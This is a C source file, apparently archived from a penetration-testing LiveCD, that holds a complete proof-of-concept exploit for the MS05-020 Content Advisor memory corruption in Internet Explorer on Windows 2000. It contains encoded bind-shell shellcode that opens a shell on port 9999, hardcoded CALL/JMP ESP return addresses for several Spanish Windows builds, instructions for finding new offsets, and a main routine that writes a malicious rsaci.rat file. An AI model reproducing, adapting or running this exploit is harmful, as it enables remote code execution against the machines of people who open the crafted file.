home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / RatBof.cpp < prev    next >
Encoding:
C/C++ Source or Header  |  2005-05-06  |  8.5 KB  |  232 lines
  1. /*
  2.  * Ms05-020 Content Advisor Memory Corruption Vulnerability POC
  3.  *
  4.  *
  5.  * Exploit by  : Miguel Tarasc≤ Acu±a - Haxorcitos.com 2004/2005
  6.  *               Tarako AT gmail.com 
  7.  *
  8.  * Credits:
  9.  *  Andres Tarasc≤ (atarasco _at_ sia.es) has discovered this vulnerability
  10.  *
  11.  * Platforms afected/tested:
  12.  *
  13.  *       - Windows 2000 SP2 Spanish
  14.  *       - Windows 2000 SP3 Spanish
  15.  *       - Windows 2000 SP4 Spanish
  16.  *       - Probably All Windows 2000 versions
  17.  *
  18.  *
  19.  * Original Advisory: http://www.microsoft.com/technet/security/bulletin/MS05-020.mspx
  20.  * Exploit Date: 22/11/2004
  21.  *
  22.  * Disclosure Timeline:
  23.  *  November 15 2004 - Discovered
  24.  *  November 22 2004 - Exploit was developed
  25.  *  November 29 2004 - Initial Vendor Notification
  26.  *  November 29 2004 - Initial Vendor Notification
  27.  *  December 15 2004 - Coordinated disclosure
  28.  *  April    12 2005 - MS05-020 Released
  29.  *
  30.  *
  31.  * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
  32.  * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
  33.  * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
  34.  *
  35.  * Greetings to: #haxorcitos, #dsr and #localhost @efnet
  36.  *
  37.  *
  38.  * rsaci.rat POC example file:
  39.  *
  40.  * ((PICS-version 1.0)
  41.  * (rating-system "http://www.haxorcitos.com/")
  42.  * (rating-service "http://www.haxorcitos.com/index.html")
  43.  * (name "AAAAA...300...AAAAA")
  44.  * (description "msrating.dll,ClickedOnRAT() - Asesor de Contenido Bof ")
  45.  *
  46.  * after double click, msrating.dll,ClickedOnRAT() is executed. CPU registers
  47.  *
  48.  *  0:001> g
  49.  *  (330.6b0): Access violation - code c0000005 (first chance)
  50.  *  First chance exceptions are reported before any exception handling.
  51.  *  This exception may be expected and handled.
  52.  *  eax=00000000 ebx=0006f638 ecx=00010101 edx=ffffffff esi=77e1588a edi=0006f360
  53.  *  eip=41414141 esp=0006f360 ebp=41414141 iopl=0         nv up ei pl zr na po nc
  54.  *  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
  55.  *  41414141 ??               ???
  56.  *
  57.  * How to get new offsets for Windows 2000:
  58.  * 1) execute generated .rat file
  59.  * 2) search for FFD4 (CALL ESP) in the memory address (for example wininet.dll)
  60.  * 3) Place your new offset into the exploit
  61.  *
  62.  */
  63.  
  64. #include <stdio.h>
  65. #include <windows.h>
  66.  
  67. #pragma pack(1)
  68.  
  69. #define RATFILE "rsaci.rat"
  70.  
  71. unsigned char shellcode[] = { // spawn a Shell on port 9999
  72.    "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
  73.    "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
  74.    "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
  75.    "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
  76.    "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
  77.    "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
  78.    "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
  79.    "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
  80.    "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
  81.    "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
  82.    "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
  83.    "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
  84.    "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
  85.    "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
  86.    "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
  87.    "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
  88.    "\x8A\x88\xAF\x87\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
  89.    "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
  90.    "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
  91.    "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
  92.    "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
  93.    "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
  94.    "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
  95.    "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
  96.    "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
  97.    "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
  98.    "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
  99.    "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
  100.    "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
  101.    "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
  102.    "\xD3\x4A\x8C\x88"
  103. };
  104.  
  105.  
  106. unsigned char RHeader[]="((PICS-version 1.0)\n"
  107.  "(rating-system \"http://www.haxorcitos.com\")\n"
  108.  "(rating-service \"http://www.haxorcitos.com/index.html\")\n"
  109.  "(name \"";
  110. unsigned char RTail[]= "\")\n"
  111.  "(description \" Ms05-020 Content Advisor Memory Corruption Vulnerability\"))\n"
  112.  "(description \" http://www.microsoft.com/technet/security/bulletin/MS05-020.mspx\"))\n"
  113.  "(description \" Exploit by Miguel Tarasc≤ Acu±a - Tarako [AT] gmail[dot]com\"))\n";
  114.  
  115. char jmpbelow[]= "\x90\xeb\xFF\x90";
  116.  
  117.  struct  { char *name;  long offset; } supported[] = { 
  118.          {" Windows 2000 Pro SP2 Spanish" , 0x772153D3}, //  FFD4  CALL ESP - wininet.dll 6.0.2900.2577
  119. /*C:\>Findjmp.exe wininet.dll ESP
  120. 0x77181783      push ESP - ret
  121. 0x771A31CB      push ESP - ret
  122. 0x771ABFB9      jmp ESP
  123. 0x771AF5FE      jmp ESP
  124. 0x771B2FAD      jmp ESP
  125. 0x771B470E      jmp ESP
  126. 0x771C8382      jmp ESP
  127. 0x771CC694      jmp ESP
  128. 0x771CE3C7      jmp ESP
  129. 0x771CFA0B      jmp ESP
  130. 0x771F5D7B      jmp ESP
  131. 0x771FE9D9      jmp ESP
  132. 0x77212C74      jmp ESP
  133. 0x7721448D      jmp ESP
  134. 0x772153D3      call ESP
  135. 0x772155AB      jmp ESP
  136. 0x77215723      jmp ESP
  137. 0x77215788      jmp ESP
  138. 0x77216161      jmp ESP
  139. 0x77216221      jmp ESP
  140. 0x772170AF      jmp ESP
  141. 0x7721745F      jmp ESP
  142. 0x772174DB      call ESP
  143. 0x77217717      call ESP
  144. 0x77217F70      call ESP
  145. 0x77218137      call ESP
  146. 0x7721813F      jmp ESP
  147. */
  148.          {" Windows 2000 Pro SP3 Spanish" , 0x76BE5983}, //  FFD4  CALL ESP - wininet.dll 5.0.3502.4619 
  149. /*C:\>Findjmp.exe wininet.dll ESP
  150. 0x76BE5983      call ESP
  151. 0x76BE8AAC      push ESP - ret*/
  152.          {" Windows 2000 Pro SP4 Spanish" , 0x702853D3}, //  FFD4  CALL ESP - wininet.dll 6.0.2800.1106
  153. /*C:\>Findjmp.exe wininet.dll ESP
  154. 0x70219C3A      push ESP - ret
  155. 0x70282C74      jmp ESP
  156. 0x70282D3D      jmp ESP
  157. 0x70283B1C      jmp ESP
  158. 0x70283BE5      jmp ESP
  159. 0x702843C4      jmp ESP
  160. 0x7028448D      jmp ESP
  161. 0x702853D3      call ESP
  162. 0x702855AB      jmp ESP
  163. 0x70285723      jmp ESP
  164. 0x70285788      jmp ESP
  165. 0x70286161      jmp ESP
  166. 0x70286221      jmp ESP
  167. 0x702870AF      jmp ESP
  168. 0x7028745F      jmp ESP
  169. 0x702874DB      call ESP
  170. 0x70287717      call ESP
  171. 0x70287F70      call ESP
  172. 0x70288137      call ESP
  173. 0x7028813F      jmp ESP*/
  174.          {" Windows 2000 Server SP4 Spanish" , 0x76BFBB5B}, //  FFE4  JMP ESP - wininet.dll 5.0.3700.6713
  175. /*C:\>Findjmp.exe wininet.dll ESP
  176. 0x76BE558B      push ESP - ret
  177. 0x76BFBB5B      jmp ESP
  178. 0x76BFC155      push ESP - ret
  179. 0x76BFC159      push ESP - ret */
  180.          {" Crash", 0x41414141}
  181.  
  182.  },VERSIONES;
  183.  
  184. /******************************************************************************/
  185. void ShowHeader(int argc) {
  186.    int i;
  187.    printf(" Ms05-020 Content Advisor Memory Corruption Vulnerability\n");
  188.    printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n\n");
  189.     
  190.    printf(" Windows Versions:\n");
  191.    printf(" ----------------------------------------\n");
  192.    for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) {
  193.       printf("  %d) %s (0x%08x)\n",i,supported[i].name,supported[i].offset);
  194.    }
  195.    printf(" ----------------------------------------\n\n");
  196.    if (argc<2) {      
  197.       printf(" Usage: ratBof.exe <Windows Version>\n");
  198.       exit(1);
  199.    }
  200. }
  201. /******************************************************************************/
  202.  
  203.  
  204. int main(int argc, char* argv[]) {
  205.    char    buf[1500];
  206.    FILE    *ratFile=fopen(RATFILE,"w");;
  207.    int i;
  208.  
  209.    ShowHeader(argc);   
  210.  
  211.    i=atoi(argv[1]);
  212.    printf(" [i] Creating exploit File for platform: %s\n",supported[i].name);
  213.  
  214.    fwrite(RHeader, sizeof(RHeader)-1, 1,ratFile);
  215.  
  216.    memset(buf,0x90,sizeof(buf));
  217.    memcpy(buf+280,jmpbelow,strlen(jmpbelow)); // salto 
  218.  
  219.  
  220.    memcpy(buf+284,&supported[i].offset,sizeof(long)); // offset
  221.    memcpy(buf+500,shellcode,sizeof(shellcode)-1);
  222.  
  223.    fwrite(buf,sizeof(buf),1,ratFile);
  224.    fwrite(RTail, sizeof(RTail), 1,ratFile);
  225.  
  226.    printf(" [i] rsaci.rat created\n\n");
  227.  
  228.    fclose(ratFile);
  229.    return 0;
  230. }
  231. /******************************************************************************/
  232.